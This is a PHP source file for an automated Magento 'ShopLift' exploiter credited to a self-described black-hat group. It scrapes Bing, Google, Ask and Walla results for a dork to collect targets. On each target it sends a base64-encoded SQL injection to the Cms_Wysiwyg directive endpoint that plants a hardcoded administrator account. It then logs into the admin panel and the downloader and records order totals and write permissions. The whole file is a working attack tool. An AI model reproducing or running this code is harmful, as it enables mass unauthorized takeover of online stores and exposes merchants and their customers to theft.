FaThurYKBH

1. <?php
2. /* ++++++++++++++++++++++++++++++++++
3. ShopLift Exploiter Beta Version
4. Author : FathurFreakz
5. Use : php thisfile.php "Dork"
6. YOGYAKARTA BLACK HAT
7. Special Thanks to
8. Nabiila Rizqi Khasanah
9. +++++++++++++++++++++++++++++++++
10. */
11. error_reporting(0);
12. set_time_limit(0);
13. class ShopLiftFathurFreakz {
14. private $dork = "";
15. private $username = "mdn_newbie";
16. private $password = "Anjing__";
17.  
18. public function Dork($dork){
19. $this->dork = $dork;
20. return $this->dork;
21. }
22.  
23. private function CurlPost($url, $post = false){
24. $ch = curl_init();
25. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
26. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
27. curl_setopt($ch, CURLOPT_URL, $url);
28. curl_setopt($ch, CURLOPT_HEADER, 0);
29. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
30. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
31. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
32. if($post !== false){
33. $isi = '';
34. foreach($post as $key=>$value){
35. $isi .= $key.'='.$value.'&';
36. }
37. rtrim($isi, '&');
38. curl_setopt($ch, CURLOPT_URL, $url);
39. curl_setopt($ch, CURLOPT_POST, count($isi));
40. curl_setopt($ch, CURLOPT_COOKIEJAR, 'pitek.txt');
41. curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
42. }
43. $data = curl_exec($ch);
44. curl_close($ch);
45. return $data;
46. }
47.  
48. private function GetStr($start,$end,$string){
49. $a = explode($start,$string);
50. $b = explode($end,$a[1]);
51. return $b[0];
52. }
53.  
54. private function LoginDownloader($url){
55. $link = parse_url($url);
56. $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
57. array("username" => $this->username,
58. "password" => $this->password)
59. );
60. if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
61. $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
62. return "Success\nPermission\t\t: ".$permission;
63. } else {
64. return "Failed";
65. }
66. }
67.  
68. private function LoginAdmin($target){
69. $link = parse_url($target);
70. $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
71. $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
72. $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
73. array("login[username]" => $this->username,
74. "login[password]" => $this->password,
75. "form_key" => $key)
76. );
77. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
78.  
79. }
80.  
81. private function ShopLiftExploit($target){
82. $email = substr(md5(time()),2,15);
83. $link = parse_url($target);
84. $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
85. array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
86. "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
87. "forwarded" => "1")
88. );
89. return (@imagecreatefromstring($data) !== false);
90. }
91.  
92. private function ExecuteExploit($victim){
93. $file = fopen("ShopLift-".date("d-m-Y").".log","a");
94. $url = parse_url($victim);
95. $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
96. if($this->ShopLiftExploit($target)){
97. $downloader = $this->LoginDownloader($target);
98. $admin = $this->LoginAdmin($target);
99. $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
100. fwrite($file,$result);
101. return $result;
102. } else {
103. return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
104. }
105. fclose($file);
106. }
107.  
108. public function SearchEngine($engine){
109. $list = array();
110. $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
111. $ccgoogle = array("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
112. switch($engine){
113. case 1:
114. for($i=0;$i<=1000;$i+=10){
115. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&first=".$i);
116. preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
117. foreach($m[1] as $link){
118. if(!preg_match("/live|msn|bing|microsoft/",$link)){
119. if(!in_array($link,$list)){
120. $list[] = $link;
121. }
122. }
123. }
124. echo "Catch [".count(array_unique($m[1]))."]\n";
125. }
126. echo "Total Bing : ".count($list)."\n";
127. break;
128. case 2:
129. for($x=0;$x<=count($ccbing)-1;$x++){
130. for($i=0;$i<=1000;$i+=10){
131. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
132. preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
133. foreach($m[1] as $link){
134. if(!preg_match("/live|msn|bing|microsoft/",$link)){
135. if(!in_array($link,$list)){
136. $list[] = $link;
137. }
138. }
139. }
140. echo "Catch [".count(array_unique($m[1]))."]\n";
141. }
142. }
143. echo "Total Bing World : ".count($list)."\n";
144. break;
145. case 3:
146. for($x=0;$x<=count($ccgoogle)-1;$x++){
147. for($i=0;$i<=200;$i+=10){
148. $search = $this->CurlPost("http://www.google.".$ccgoogle[$x]."/search?num=50&q=".urlencode($this->dork)."&start=".$i."&sa=N");
149. preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
150. foreach($m[1] as $link){
151. if(!preg_match("/google/",$link)){
152. if(!in_array($link,$list)){
153. $list[] = $link;
154. }
155. }
156. }
157. echo "Catch [".count(array_unique($m[1]))."]\n";
158. }
159. }
160. echo "Total Google World : ".count($list)."\n";
161. break;
162. case 4:
163. for($x=0;$x<=count($ccbing)-1;$x++){
164. for($i=1;$i<=1000;$i+=100){
165. $search = $this->CurlPost("http://".$ccbing[$x].".ask.com/web?q=".urlencode($this->dork)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
166. preg_match_all('/href=\"http:\/\/(.*?)\" onmousedown=/m', $search, $m);
167. foreach($m[1] as $link){
168. if(!preg_match("/ask\.com/",$link)){
169. if(!in_array($link,$list)){
170. $list[] = $link;
171. }
172. }
173. }
174. echo "Catch [".count(array_unique($m[1]))."]\n";
175. }
176. }
177. echo "Total Ask World : ".count($list)."\n";
178. break;
179. case 5:
180. for($i=1;$i<=100;$i+=1){
181. $search = $this->CurlPost("http://search.walla.co.il/?q=".urlencode($this->dork)."&type=text&page=".$i);
182. preg_match_all('/<a href=\"http:\/\/(.+?)\" title=/m', $search, $m);
183. foreach($m[1] as $link){
184. if(!preg_match("/walla\.co\.il/",$link)){
185. if(!in_array($link,$list)){
186. $list[] = $link;
187. }
188. }
189. }
190. echo "Catch [".count(array_unique($m[1]))."]\n";
191. }
192. echo "Total Walla : ".count($list)."\n";
193. break;
194. }
195. if(count($list)>0){
196. echo "Exploiting target ".count($list).". Please wait ... \n";
197. foreach($list as $do){
198. echo $this->ExecuteExploit($do);
199. }
200. }
201. }
202.  
203. public function ExploitLogo(){
204. $logo = "==================================================\n";
205. $logo .= "#\t Magento ShopLift Auto Exploiter \t #\n";
206. $logo .= "#------------------------------------------------#\n";
207. $logo .= "#\t Author \t: FathurFreakz \t\t #\n";
208. $logo .= "#\t Email \t\t: fathurfreakz@gmail.com #\n";
209. $logo .= "#\t Thanks to \t: Nabiila Rizqi K \t #\n";
210. $logo .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
211. $logo .= "#------------------------------------------------#\n";
212. $logo .= "#\t (C) ".date("Y")." YOGYAKARTA BLACK HAT \t\t #\n";
213. $logo .= "==================================================\n";
214. echo $logo;
215. }
216. }
217. $Exploiter = new ShopLiftFathurFreakz();
218. if(isset($argv[1]) && !empty($argv[1])){
219. echo "Scanning target for dork : {$argv[1]}\n";
220. $Exploiter->Dork($argv[1]);
221. for($i=0;$i<6;$i++){
222. $Exploiter->SearchEngine($i);
223. flush();
224. sleep(1);
225. }
226. echo "Scan finished !!!\n";
227. flush();
228. sleep(1);
229. echo "Shuting down engine !!!\n";
230. } else {
231. $Exploiter->ExploitLogo();
232. }